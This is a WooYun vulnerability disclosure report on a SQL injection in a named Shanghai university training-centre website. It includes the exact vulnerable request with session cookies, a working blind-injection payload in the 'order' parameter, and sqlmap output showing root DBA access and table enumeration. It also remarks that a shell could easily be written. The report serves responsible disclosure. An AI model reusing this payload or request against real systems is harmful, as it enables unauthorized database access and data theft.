当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158787

漏洞标题:上海中医药大学某站sql注入(DBA权限)

相关厂商:上海中医药大学

漏洞作者: 路人甲

提交时间:2015-12-07 11:33

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

RT

详细说明:

http://cstc.shutcm.edu.cn/ 上海中医药大学临床技能实训中心


GET /index.php?option=com_gvsunvd&order=1&page=1&query=&range=all&sort=desc&type=1&view=search HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://cstc.shutcm.edu.cn
Cookie: 4b1e854185ff407f299fee72cc9f0083=lhuc2mdi1gbs7oi90nhf48c197; 4061268b622faf5442048572085f9200=774him6v53jlr7eogaee1qlh57; MoodleSession=iklt3ctdj48f51hq77vq6t8or1; JSESSIONID=8E66120270E1133222F11778AFA37BC7
Host: cstc.shutcm.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


order参数存在注入

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: order (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_gvsunvd&order=1 RLIKE (SELECT (CASE WHEN (4952=4952) THEN 1 ELSE 0x28 END))&page=1&query=&range=all&sort=desc&type=1&view=search
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5
current user:    'root@%'
current database:    'cstc'
current user is DBA:    True
available databases [7]:
[*] cstc
[*] information_schema
[*] moodle
[*] mysql
[*] performance_schema
[*] survey
[*] test


back-end DBMS: MySQL 5
[13:37:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[13:37:16] [INFO] fetching tables for database: 'cstc'
[13:37:16] [INFO] fetching number of tables for database 'cstc'
[13:37:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:37:16] [INFO] retrieved: 100
[13:37:22] [INFO] retrieved: hji2n_acepolls_options
[13:38:36] [INFO] retrieved: hji2n_acepolls_polls
[13:39:04] [INFO] retrieved: hji2n_acepolls_votes
[13:39:32] [INFO] retrieved: hji2n_assets
[13:39:54] [INFO] retrieved: hji2n_associations
[13:40:32] [INFO] retrieved: hji2n_banner_clients
[13:41:23] [INFO] retrieved: hji2n_banner_tracks
[13:41:52] [INFO] retrieved: hji2n_banner
[13:42:29] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
s
[13:42:35] [INFO] retrieved: hji2n_categories
[13:43:11] [INFO] retrieved: hji2n_contact_details
[13:44:01] [INFO] retrieved: hji2n_content
[13:44:19] [INFO] retrieved: hji2n_content_frontpage
[13:45:01] [INFO] retrieved: hji2n_content_rating
[13:45:31] [INFO] retrieved: hji2n_core_log_searches
[13:46:26] [INFO] retrieved: hji2n_cstc_bases
[13:47:01] [INFO] retrieved: hji2n_cstc_colleges
[13:47:38] [INFO] retrieved: hji2n_cstc_degrees
[13:48:13] [INFO] retrieved:
[13:48:45] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
hji2n_cstc_disciplines
[13:49:26] [INFO] retrieved: hji2n_cstc_dissubjects
[13:50:01] [INFO] retrieved: hji2n_cstc_durations
[13:50:37] [INFO] retrieved: hji2n_cstc_educations
[13:51:21] [INFO] retrieved: hji2n_cstc_examr
[13:52:15] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
ecords
[13:52:35] [INFO] retrieved: hji2n_cstc_examrooms
[13:53:02] [INFO] retrieved: hji2n_cstc_exams
[13:53:16] [INFO] retrieved: hji2n_cstc_langmaps
[13:53:50] [INFO] retrieved: hji2n_cstc_mapexaminer
[13:54:40] [INFO] retrieved: hji2n_cstc_mapquestion
[13:55:18] [INFO] retrieved: hji2n_cstc_mapquestiongroup
[13:55:49] [INFO] retrieved: hji2
[13:56:23] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
n_cstc_provinces
[13:57:01] [INFO] retrieved: hji2n_cstc_questiong
[13:58:10] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
roups
[13:58:26] [INFO] retrieved: hji2n_cstc_questionmedias
[13:58:57] [INFO] retrieved: hji2n_cstc_questions
[13:59:14] [INFO] retrieved: hji2n_cstc_rooms
[13:59:39] [INFO] retrieved: hji2n_cstc_students
[14:00:14] [INFO] retrieved: hji2n_cstc_subjects
[14:00:45] [INFO] retrieved: hji2n_cstc_subquesti

漏洞证明:

修复方案:

DBA权限,比较容易写shell,降权吧,多处注入

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-08 12:24

厂商回复:

数据库端口已通过系统防火墙封闭,校园网无法访问到

最新状态:

暂无